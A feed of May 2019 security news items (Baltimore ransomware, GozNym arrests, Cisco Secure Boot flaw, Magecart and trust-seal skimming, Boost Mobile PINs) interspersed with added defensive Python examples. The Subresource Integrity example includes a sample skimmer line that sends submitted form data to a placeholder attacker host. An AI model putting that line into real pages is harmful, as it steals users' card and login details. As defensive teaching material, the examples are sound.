Cyber Risk News

Baltimore Won't Pay Ransom, Systems Remain Down

Info Security - Fri, 05/17/2019 - 11:54

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to a copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers’ warning that they would cut off contact if the city called the FBI, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear: the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

Categories: Cyber Risk News

Hacktivist Attacks Have Fallen 95% Since 2015

Info Security - Fri, 05/17/2019 - 10:45

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant because the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested were sentenced in 2018 and 2019 to three or more years in prison. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence for DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling

Info Security - Fri, 05/17/2019 - 09:11

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

The activity originated in Israel and targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads, paid for in Brazilian reals, Israeli shekels and US dollars. The ads ran from 2012 to 2019, which raises questions about why the network wasn’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang

Info Security - Fri, 05/17/2019 - 08:45

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

Kapkanov was re-arrested in 2018; during an earlier search of his flat he had fired an assault rifle at Ukrainian police. Another man, Krasimir Nikolov, of Varna, Bulgaria, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Critical Vulnerabilities in Cisco Products

Info Security - Thu, 05/16/2019 - 18:07

A high-risk vulnerability in Cisco's Secure Boot process was disclosed earlier this week by Cisco and Red Balloon Security and is believed to affect an estimated 100 or more Cisco products.

The vulnerability (CVE-2019-1649) lies “in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation [and] could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality,” Cisco reported.

Additionally, Cisco reported that another vulnerability (CVE-2019-1862) in the “web-based user interface (Web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker to execute commands on the underlying Linux shell of an affected device with root privileges.”

The Secure Boot vulnerability, which Red Balloon has named Thrangrycat, affects millions of Cisco devices (including routers, switches and firewalls). On its own it requires an authenticated local attacker, but chained with a root-level bug such as CVE-2019-1862 it exposes a large number of corporate and government networks to remote attacks, according to Red Balloon Security.

Cisco said it will release software patches for the Secure Boot flaw, and noted that there are no workarounds.

An attacker could exploit it to gain full and persistent access to affected networks. Because the weakness is in hardware, Red Balloon argues that a software patch alone cannot fully remove it, so affected organizations will find it difficult to completely mitigate the threat.

“This is a significant security weakness which potentially exposes a large number of corporate, government and even military networks to remote attacks,” said Dr. Ang Cui, founder and chief scientist of Red Balloon Security, in a press release. 

“We're talking about tens of millions of devices potentially affected by this vulnerability, many of them located inside of sensitive networks. These Cisco products form the backbone of secure communications for these organizations, and yet we can exploit them to permanently own their networks. Fixing this problem isn't easy, because to truly remediate it requires a physical replacement of the chip at the heart of the Trust Anchor system. A firmware patch will help to offset the risks, but it won't completely eliminate them. This is the real danger, and it will be difficult for companies, financial institutions and government agencies to properly address this problem.”
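To make concrete why Cui says a firmware patch can only offset the risk, here is an added toy model, written for this page; it is not Cisco's Trust Anchor design and not the Thrangrycat technique. The model assumes a device whose immutable ROM can hold at most one hash, and whose writable flash holds both the "anchor" image (the thing that verifies firmware) and the firmware itself. When nothing immutable pins the anchor, an attacker with a flash-write primitive rewrites the anchor along with the firmware, and a defender's reflash is undone by the next write; when the ROM pins the anchor's hash, the same write is caught at power-on. All names and images are constructed for the example.

```python
"""Toy model of a hardware-anchored boot chain: added illustration only,
not Cisco's Trust Anchor design or the Thrangrycat exploit."""
import hashlib
from dataclasses import dataclass, field
from typing import Optional


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


# The anchor image is modelled as "<mode>:<expected firmware hash hex>".
# ENFORCE halts boot on a hash mismatch; BYPASS skips the check entirely.
def make_anchor(firmware: bytes, mode: str = "ENFORCE") -> bytes:
    return f"{mode}:{sha256(firmware).hex()}".encode()


@dataclass
class Device:
    # Mutable storage that an attacker with root on the box can rewrite.
    flash: dict = field(default_factory=dict)
    # Immutable ROM. None models an anchor that nothing verifies (the flaw);
    # a hash models an anchor whose integrity is pinned in silicon (the fix).
    rom_anchor_hash: Optional[bytes] = None

    def boot(self) -> str:
        anchor = self.flash["anchor"]
        # Stage 0: if the ROM pins the anchor, a modified anchor never runs.
        if self.rom_anchor_hash is not None and sha256(anchor) != self.rom_anchor_hash:
            return "HALT: anchor tampered"
        mode, expected = anchor.decode().split(":", 1)
        # Stage 1: the anchor, whatever it now says, verifies the firmware.
        if mode == "ENFORCE" and sha256(self.flash["firmware"]).hex() != expected:
            return "HALT: firmware tampered"
        return "RUN:" + self.flash["firmware"].decode()


def provision(firmware: bytes, pin_anchor_in_rom: bool) -> Device:
    anchor = make_anchor(firmware)
    dev = Device(flash={"anchor": anchor, "firmware": firmware})
    if pin_anchor_in_rom:
        dev.rom_anchor_hash = sha256(anchor)
    return dev


def attacker_reflash(dev: Device, evil_firmware: bytes) -> str:
    """Local attacker with a flash-write primitive: swap the firmware, rewrite
    the anchor so it no longer enforces, then boot and report the outcome."""
    dev.flash["firmware"] = evil_firmware
    dev.flash["anchor"] = make_anchor(evil_firmware, mode="BYPASS")
    return dev.boot()


def defender_patch(dev: Device, good_firmware: bytes) -> None:
    """A firmware-only 'patch': restore a clean, enforcing anchor in flash.
    Without a ROM pin, the attacker's next write undoes it."""
    dev.flash["firmware"] = good_firmware
    dev.flash["anchor"] = make_anchor(good_firmware)


GOOD = b"vendor-ios"    # constructed sample firmware images
EVIL = b"implant-ios"

if __name__ == "__main__":
    weak = provision(GOOD, pin_anchor_in_rom=False)
    print(attacker_reflash(weak, EVIL))      # RUN:implant-ios
    defender_patch(weak, GOOD)
    print(weak.boot())                        # RUN:vendor-ios
    print(attacker_reflash(weak, EVIL))      # RUN:implant-ios, patch undone
    strong = provision(GOOD, pin_anchor_in_rom=True)
    print(attacker_reflash(strong, EVIL))    # HALT: anchor tampered
```

The lesson is the one in Cui's quote: a chain of trust is only as immutable as its first link, and if that link can be rewritten by the same primitive the attacker already has, reflashing it is a race the defender loses. The check a practitioner wants on real hardware is therefore not "is the firmware image signed" but "is the verifier's own image, and the hash it is checked against, held in something the OS cannot write".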

Forbes Site Up, Then Down Again after Magecart Attack

Info Security - Thu, 05/16/2019 - 17:12

Forbes was reportedly back online but went down again at 3:30 pm UTC after reports that the site was hit with the Magecart card-skimming malware, according to security researcher Troy Mursch.

Mursch tweeted on May 15 that Forbes had been infected with the Magecart malware, adding that customers who made a purchase while the site was compromised likely had their credit card information stolen. In a later tweet, Mursch confirmed that the malware had been removed.

Hackers apparently injected obfuscated JavaScript, which may be linked to the ongoing supply chain attacks reported by Willem de Groot this week. Forbes is, according to The Register, a customer of Picreel, which has itself been the victim of a supply chain attack.

Mursch reportedly sent several emails in an attempt to alert Forbes to the Magecart infection and reported the problem to the domain owner, yet he has not heard back from Forbes, The Register said.

“Threat actors have used several methods of attacking websites. There’s a trend, though, towards attacking the payment page supply chain, which offers the most bang for their buck because third parties offer direct links to a larger number of customers, including high-profile companies that would otherwise be harder to compromise,” said Mike Bittner, associate director of digital security and operations, The Media Trust.

“These pages are soft targets for several reasons. They run third-party code supplied by vendors who operate on very tight – sometimes negative – profit margins and must scrutinize every expense. Such businesses too often fail to give security and privacy the priority they require. Second, third-party code executes outside the website owner’s infrastructure, making them hard, if not impossible, to monitor without the right tools and expertise. Third, in many publications, these payment pages do not fall under the website operators’ rev ops teams, who make pivotal decisions on security and privacy.

“The bottom line here is that publishers should carefully vet ALL their third parties for security and privacy and conduct frequent audits to ensure they have adequate security measures in place. Because every one of their third parties is likely not only vulnerable but under attack.”

Supply Chain Attack Hits Best of the Web Website

Info Security - Thu, 05/16/2019 - 16:48

The website Best of the Web, whose purpose is to assure site visitors that their user data is safe and that the websites it lists value visitor privacy, has been hacked, according to security researcher Willem de Groot. The site is a directory of websites that receive a trust seal so visitors will know they are real businesses, but the seal itself was injected with information-stealing malware.

On May 13, the researcher tweeted that the Best of the Web seal was injected with two keyloggers and that more than 100 websites were still linked to the compromised seal.

Attackers reportedly injected obfuscated JavaScript code, and in his latest tweet de Groot confirmed that they used open (world-writable) S3 buckets to plant the form-jacking scripts. De Groot has identified several supply chain attacks that have impacted multiple companies (complete list at PublicWWW), including Picreel, historydaily.org, groupon.com.ar, groupon.cl, trome.pe and tributes.com.

Best of the Web confirmed that it had been compromised, stating, "Earlier today, we were notified that the script we use to display trust seals that we host on Amazon’s content delivery network (CDN) was compromised. We took immediate action to remedy the situation and are in the process of informing those who were affected. We will be conducting a full security audit of our hosted accounts to ensure that this does not happen again.”

“In this latest supply chain attack, hackers went after the weakest link with the most impact to affect the greatest number of websites,” said Matan Or-El, CEO of Panorays. “It’s certainly ironic to hack a trust seal, and the message is clear: you cannot trust anything. This cyber incident underscores the importance of assessing the security of all third parties and continuously monitoring them, since their status can quickly change, as was the case here where the code was maliciously modified.”
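Both the Forbes/Picreel story above and this one have the same shape: a site embeds a vendor's script from a CDN or bucket the vendor controls, and the attacker changes that file in place. The browser-side control for exactly this case is Subresource Integrity, where the embedding site pins a hash of the known-good script and the browser refuses to run anything else. Here is an added example, not code from Best of the Web, Picreel, Forbes or the researchers quoted, that computes the pin and models how a browser applies it. The seal script, the injected skimmer and the vendor hostname are constructed for the demonstration.

```python
"""Subresource Integrity (SRI): compute the integrity value for a third-party
script and check fetched bytes against it the way a browser does.
Added example; sample scripts and hostnames below are constructed."""
import base64
import hashlib

SRI_ALGOS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}


def sri_value(script: bytes, algo: str = "sha384") -> str:
    """Integrity value the site owner pins for a reviewed, known-good copy."""
    digest = SRI_ALGOS[algo](script).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def browser_allows(fetched: bytes, integrity: str) -> bool:
    """True only if the fetched bytes match a pinned hash. Mirrors the spec:
    tokens are space-separated, unknown algorithms are ignored, the strongest
    supported algorithm is the one that counts, and no usable token at all
    means the script runs unverified (which is the failure mode to avoid)."""
    by_algo = {}
    for token in integrity.split():
        algo, _, b64 = token.partition("-")
        if algo in SRI_ALGOS:
            by_algo.setdefault(algo, set()).add(b64)
    if not by_algo:
        return True
    strongest = max(by_algo, key=lambda a: SRI_ALGOS[a]().digest_size)
    actual = base64.b64encode(SRI_ALGOS[strongest](fetched).digest()).decode()
    return actual in by_algo[strongest]


def script_tag(src: str, integrity: str) -> str:
    """crossorigin is mandatory for SRI on a cross-origin script, and the CDN
    must answer with CORS headers, or the browser blocks the load entirely."""
    return f'<script src="{src}" integrity="{integrity}" crossorigin="anonymous"></script>'


# Constructed sample: the vendor's legitimate seal script ...
SEAL_JS = b"(function(){document.getElementById('seal').src='/badge.png';})();"
# ... and what an attacker with write access to the CDN/bucket appends to it.
SKIMMER = (b"window.addEventListener('submit',function(e){"
           b"fetch('https://collect.example-evil.test/',{method:'POST',body:new FormData(e.target)})});")
TAMPERED_JS = SEAL_JS + SKIMMER

if __name__ == "__main__":
    pin = sri_value(SEAL_JS)
    print(script_tag("https://cdn.example-seal.test/seal.js", pin))
    print(browser_allows(SEAL_JS, pin))       # True: the reviewed file runs
    print(browser_allows(TAMPERED_JS, pin))   # False: the injected copy is refused
```

Two caveats a practitioner will hit. SRI only works for a file whose bytes do not change, so a vendor that rewrites its script on every deploy forces the site to either re-pin on each change or fall back to a Content-Security-Policy allowlist, which blocks unknown hosts but not a tampered file on an allowed one. And SRI says nothing about what the script loads in turn; a pinned loader that pulls a second, unpinned stage from the same bucket gives no protection at all, which is why the vendor's hosting (here, a writable S3 bucket) still has to be audited.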

UK Fraud Complaints Surge Over 40%

Info Security - Thu, 05/16/2019 - 10:12

UK consumers’ complaints over banking fraud have surged by over 40% to hit an all-time high in the 2018-19 financial year, driven by online scams, according to official figures.

The Financial Ombudsman Service (FOS), which settles disputes between customers and their banks, said it received 12,195 complaints over the period, a 43% increase on the 6,952 in the previous 12 months.

“One of the fastest-growing types of fraud is authorized push payment (APP) fraud — where people unwittingly act on fraudsters’ instructions and carry out the transactions themselves,” the FOS said.

“We’ve been taking a close look at the APP complaints we’ve received. And we’ve reminded banks of their existing obligations to ensure that victims of fraud are treated fairly, as we’ve found that they haven’t always got this right.”

A new voluntary code of practice will come into force at the end of May designed to help victims of APP fraud get their money back more easily. Up until now, banks have been reluctant to pay out in such cases and often blame the individual.

Some £354m was lost to APP fraud in the UK last year, up 50% from 2017. Although some lenders, like TSB, have sought to differentiate by promising to refund victims, the industry in general has been slow to react to the threat.

“Bank transfer fraud is spiraling out of control, with people losing life-changing sums every day and then facing a grueling battle to get their money back from the very banks that should be preventing them from falling victim in the first place,” argued Gareth Shaw, head of money at consumer rights group Which.

“Banks have just two weeks to sign up to the new industry code [of practice], which will only be deemed a success if they finally halt this worsening crime by offering better protection to their customers, while swiftly and fairly reimbursing all those who lose money through no fault of their own.”

Another new proposal comes from the Payment Systems Regulator (PSR) and will introduce “confirmation of payee checks” to warn users when the name they enter into online bank transfers doesn’t match the sort code and account number on record.

However, a July 1, 2019 deadline is now set to be pushed back to 2020.

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Info Security - Thu, 05/16/2019 - 09:22

Privacy campaigners are hailing a major legal victory after the UK Supreme Court ruled that the intelligence services should not be exempt from oversight by ordinary UK courts.

Privacy International (PI) has fought a five-year case with the government, following the Edward Snowden disclosures that UK spies used bulk hacking techniques which may have impacted millions.

The case was initially heard in the secret Investigatory Powers Tribunal (IPT) — which rules specifically on cases involving the intelligence services. It agreed in principle with the government that it would be acceptable to use a single, broad warrant to hack every mobile phone in a UK city.

PI tried to fight that decision in the High Court, with the government arguing that IPT rulings couldn’t be subject to regular judicial review. Both the High Court and then the Court of Appeal agreed with the government, but the rights group was in 2017 allowed to take its case all the way to the Supreme Court.

Its decision yesterday effectively means that IPT decisions can be subject to judicial review in the High Court, which means mistakes made by the tribunal can now be corrected by the courts.

PI general counsel, Caroline Wilson Palow, argued the ruling was a “historic victory for the rule of law.”

“Countries around the world are currently grappling with serious questions regarding what power should reside in each branch of government. Today's ruling is a welcome precedent for all of those countries, striking a reasonable balance between executive, legislative and judicial power,” she added.

“Today's ruling paves the way for Privacy International's challenge to the UK government's use of bulk computer hacking warrants. Our challenge has been delayed for years by the government's persistent attempt to protect the IPT’s decisions from scrutiny. We are heartened that our case will now go forward."

Trump Declares National Emergency to Contain China Threat

Info Security - Thu, 05/16/2019 - 08:31

The Trump administration has turned up the heat on China after declaring a national emergency designed ostensibly to protect US networks from “foreign adversaries.”

Although China and Huawei are not named in the declaration, it is widely seen as a move designed to target the latter. It will effectively extend the federal ban on Huawei equipment to all US firms.

Separately, and perhaps even more importantly, the Shenzhen giant and 70 affiliates have been placed on the Commerce Department’s “entity list.”

This means that it will not be able to source key components from US providers without Commerce Department approval.

Depending on whether this approval is granted, this could put the firm in a position as serious as ZTE's when US firms were prohibited from selling to it after the Chinese telecoms firm broke Iran sanctions. At that time, only an intervention from Trump saved the company.

US officials told Reuters the decision would make it nearly impossible for Huawei to sell some of its products as they rely on US-made kit.

A White House statement revealed that the Executive Order invoked the International Emergency Economic Powers Act, which allows a President to interfere with commerce in order to protect national security. The Commerce Department now has 150 days to draw up an enforcement plan.

“The President has made it clear that this administration will do what it takes to keep America safe and prosperous, and to protect America from foreign adversaries who are actively and increasingly creating and exploiting vulnerabilities in information and communications technology infrastructure and services in the United States,” noted a message from the White House press secretary.

“This Executive Order declares a national emergency with respect to the threats against information and communications technology and services in the United States and delegates authority to the Secretary of Commerce to prohibit transactions posing an unacceptable risk to the national security of the United States or the security and safety of United States persons.”

Unsurprisingly, Huawei and China have hit back, claiming the order will not make the US safer but only result in delayed 5G roll-outs which will harm consumers.

Washington has so far failed to produce any hard evidence to suggest that Huawei is a national security risk, although Chinese law demands that any Middle Kingdom firm co-operate with the authorities if required.

However, UK intelligence services have raised serious concerns around the quality of the telecoms kit maker’s “security and engineering processes.”

Still, Prime Minister Theresa May recently overruled several Cabinet members in approving the firm to supply non-core 5G kit.

Steve Patton, director and cybersecurity specialist at Telesoft Technologies, argued that a “measured approach” is needed to combat telecoms cyber risk.

“Even with a network built from other, non-Chinese vendors, there should be additional protection and — more importantly — monitoring of critical infrastructure to scan for threats,” he said.

“After all, given we live in a truly technological age, where cyber-threats are increasingly advanced, it's impossible to guarantee that any one vendor is fully immune from attacks.”

Companies' Stock Value Dropped 7.5% after Data Breaches

Info Security - Wed, 05/15/2019 - 17:44

Analyzing the three largest breaches of the past three years, Bitglass found that for publicly traded companies a fall in share price was one of the most measurable consequences of a data breach.

The report, Kings of the Monster Breaches, identified the extensive damage done by improper security by looking specifically at the Marriott breach of 2018, the Equifax breach of 2017 and the Yahoo! breach of 2016. These top three breaches had a widespread impact on individuals, with a reported mean number of 257 million individuals directly affected by each breach.  

Research also showed that these breaches have cost an average of $347 million in legal fees, penalties and remediation costs. “Marriott uncovered the breach while seeking GDPR compliance; the company is now being fined $912 million under the regulation,” the report said.

The top breaches resulted from outside attackers employing phishing campaigns, using malware or exploiting technical vulnerabilities, which was the case for Equifax. “Through this vulnerability, hackers were able to access sensitive data such as Social Security numbers, credit card numbers, full names, dates of birth, and home addresses. It took roughly two months for the breach to be discovered. The company’s CSO, Susan Mauldin, and CIO, David Webb, retired immediately after the security lapse had been announced,” according to the report.

Publicly traded companies suffered an average drop of 7.5% in their stock values and a mean market cap loss of $5.4 billion per company, and it reportedly took 46 days, on average, for those stock prices to return to their pre-breach levels. To date, the stock price of Equifax has not yet recovered.

"The largest breaches over the past three years have caused massive and irreparable damage to large enterprises and their stakeholders around the globe," said Rich Campagna, chief marketing officer of Bitglass.

"This should serve as a stark warning to organizations everywhere. If massive companies with seemingly endless resources are falling victim to external attacks, then companies of all sizes must remain vigilant in their cybersecurity efforts. It is only by taking a proactive approach to security that breaches can be prevented and data can truly be kept safe.”

IT Decision-Makers Willing to Share Threat Intel

Info Security - Wed, 05/15/2019 - 17:07

The sharing mentality is starting to take hold across the cybersecurity industry, with the vast majority of security decision-makers confessing that they would be willing to share threat intelligence, according to a new publication by IronNet.

The report, Collective Offense Calls for Collective Defense: A Reality Check for Cybersecurity Decision Makers, surveyed 200 U.S. security IT decision-makers. Of those, 94% stated that their organization would be willing to increase the level of threat sharing with their industry peers if it demonstrably improved their ability to detect threats.

Additionally, 92% of respondents said they would even increase threat sharing with the government if it meant the government could use political, economic, cyber, or other national-level capabilities to deter cyber-attacks, the report said.

As nation-state attacks become more prevalent, threat actors are collaborating on techniques to make their attacks more profitable, leaving individual security teams to defend themselves against a collective offense.

The report also found that organizations are suffering an average of one cybersecurity incident every three months, with 80% saying the incident was so severe that it required C-level and/or board meetings afterward.

“Despite most IT decision makers’ reported confidence that their cybersecurity capabilities are advanced and in better shape than others in their industry (55%), they nonetheless experienced an average of four attacks on their organization over a 12 month period, with 20% of respondents being hit six or more times,” the report said.

“Organizations are increasingly grasping the need for better threat information sharing. Half of decision makers surveyed noted that their threat sharing tool could be improved upon, and 46% identified a need for enhanced sharing of cyber attacker tools, tactics, and procedures (TTP) and faster sharing of raw intelligence at network speed. The lack of such protections magnified the damage from recent attacks like Norsk Hydro, NotPetya, and others that quickly spread from company to company and could have been mitigated by better collective defense.”

Boost Mobile Alerts Customers of Security Incident

Info Security - Wed, 05/15/2019 - 16:59

Customers of Boost Mobile are being urged to change their passwords and PINs after the company announced that it detected unauthorized activity from a third party.

“On March 14, 2019, Boost.com experienced unauthorized online account activity in which an unauthorized person accessed your account through your Boost phone number and Boost.com PIN code,” the notice of a security incident said.

“The Boost Mobile fraud team discovered the incident and was able to implement a permanent solution to prevent similar unauthorized account activity.”

Attackers using compromised credentials accounted for 29% of data breaches, according to Verizon’s 2019 Data Breach Investigation Report. The unauthorized access at Boost Mobile is what Byron Rashed, VP of marketing, Centripetal, called a classic example of a series of events that enables threat actors to infiltrate networks and exfiltrate customer data and/or personally identifiable information.

“Usually, a compromised credential from a third-party breach starts the process. The threat actor can use various unsophisticated/sophisticated techniques to either obtain a password or crack a hashed password. Once an account is compromised, the threat actor can find a way into the network and access various databases,” Rashed said.

“The credentials can be a typical customer/user and/or an admin that has network access. Threat actors can leverage various tools and social media to find out information on users/admins and obtain a password (such as the names of spouses, children, pets, etc.) and try different combinations using automated tools.”

In addition to urging customers to follow the security guidance published by the Federal Trade Commission, Boost Mobile sent a temporary PIN code via text message, reminding customers to avoid combinations such as "1234" or "0000."

“The best defense against attackers using stolen credentials is to use a password that is unique with various characters and one that does not contain anything that is specific to the individual as noted,” Rashed added.

“On the network defense side, shielding against known IPs, domains, and other sources is critical. Most breaches come from known sources. To shield these sources from the onset greatly increases the organization’s security posture.”
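Boost's account model, as the notice describes it, is a phone number plus a short PIN, and a phone number is not a secret. That makes two server-side controls decisive: refusing the PINs a guesser tries first, and throttling verification so the remaining space cannot be walked. The following is an added example of both, written for this page; it is not Boost Mobile's code and assumes nothing about their systems. The common-PIN list, the sample phone numbers and the in-memory account store are constructed for the demonstration.

```python
"""PIN policy plus throttled verification for a phone-number-plus-PIN login.
Added example, not Boost Mobile's code; sample data is constructed."""
import hashlib
import hmac
import os
import time
from typing import Optional, Tuple

# Constructed short list of PINs that top most leaked-PIN frequency tables.
COMMON_PINS = {"1234", "0000", "1111", "1212", "7777", "1004", "2000", "4444", "2222", "6969"}


def is_weak_pin(pin: str, phone: str = "") -> bool:
    """True for PINs a guesser tries first: wrong length or non-digit, on the
    common list, one repeated digit, an ascending or descending run, or a
    substring of the account's own phone number."""
    if not (pin.isdigit() and len(pin) in (4, 6)):
        return True
    if pin in COMMON_PINS or len(set(pin)) == 1:
        return True
    digits = [int(c) for c in pin]
    steps = {b - a for a, b in zip(digits, digits[1:])}
    if steps in ({1}, {-1}):
        return True
    return pin in phone


def hash_pin(pin: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2 so a leaked table cannot be reversed with one 10,000-entry lookup."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 100_000)


class PinVerifier:
    """Per-account failure counter with lockout; hashes compared in constant time."""

    def __init__(self, max_attempts: int = 5, lockout_seconds: int = 900):
        self.max_attempts = max_attempts
        self.lockout_seconds = lockout_seconds
        self.accounts = {}  # phone -> {"salt", "hash", "failures", "locked_until"}

    def enroll(self, phone: str, pin: str) -> None:
        if is_weak_pin(pin, phone):
            raise ValueError("weak PIN rejected")
        salt, digest = hash_pin(pin)
        self.accounts[phone] = {"salt": salt, "hash": digest, "failures": 0, "locked_until": 0.0}

    def verify(self, phone: str, pin: str, now: Optional[float] = None) -> str:
        """Returns 'ok', 'denied' or 'locked'. 'now' is injectable for testing."""
        now = time.time() if now is None else now
        acct = self.accounts.get(phone)
        if acct is None:
            return "denied"  # same answer as a wrong PIN: no account enumeration
        if now < acct["locked_until"]:
            return "locked"
        _, digest = hash_pin(pin, acct["salt"])
        if hmac.compare_digest(digest, acct["hash"]):
            acct["failures"] = 0
            return "ok"
        acct["failures"] += 1
        if acct["failures"] >= self.max_attempts:
            acct["locked_until"] = now + self.lockout_seconds
            acct["failures"] = 0
            return "locked"
        return "denied"


if __name__ == "__main__":
    v = PinVerifier()
    v.enroll("5551234567", "8391")           # accepted
    for guess in ("1234", "0000", "1111", "2345", "4567"):
        print(guess, v.verify("5551234567", guess, now=1000.0))   # 4x denied, then locked
    print(v.verify("5551234567", "8391", now=1000.0))   # locked: even the right PIN waits
    print(v.verify("5551234567", "8391", now=2000.0))   # ok after the lockout expires
```

The lockout is keyed on the account, which is what stops a guesser who already knows the phone number; a source-IP limit alone is defeated by rotating through proxies. A temporary PIN sent by SMS, as in Boost's remediation, should go through the same `enroll` policy the moment the customer replaces it, otherwise "1234" comes straight back.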

Hospitals Failing on Cybersecurity Hygiene

Info Security - Wed, 05/15/2019 - 10:55

Healthcare organizations (HCOs) are increasingly at risk from legacy operating systems, device complexity and the use of commonly exploited protocols, according to a new study from Forescout.

The security vendor analyzed 75 global healthcare deployments running over 1.5 million devices across 10,000 virtual local area networks (VLANs).

It found that although less than 1% were running unsupported operating systems, 71% of Windows devices were on Windows 7, Windows 2008 or Windows Mobile, which reach end of life in January 2020 — less than a year away.

These HCOs are further exposing themselves to threats by using high-risk services like SMB, which was exploited in the infamous WannaCry attacks, as well as RDP, FTP and others. Some 85% of Windows devices had SMB turned on, while over a third (35%) were running RDP, which is commonly used in fileless attacks.

The sheer range of medical devices in use also presents greater cyber-risks, especially as many aren’t architected with security in mind, the report claimed.

A third (34%) of organizations’ medical VLANs were found to support more than 100 distinct device vendors. Even more are likely to exist on other networks.

Patching is often problematic due to the criticality of these devices and the fact that, in some cases, doing so invalidates the product’s warranty.

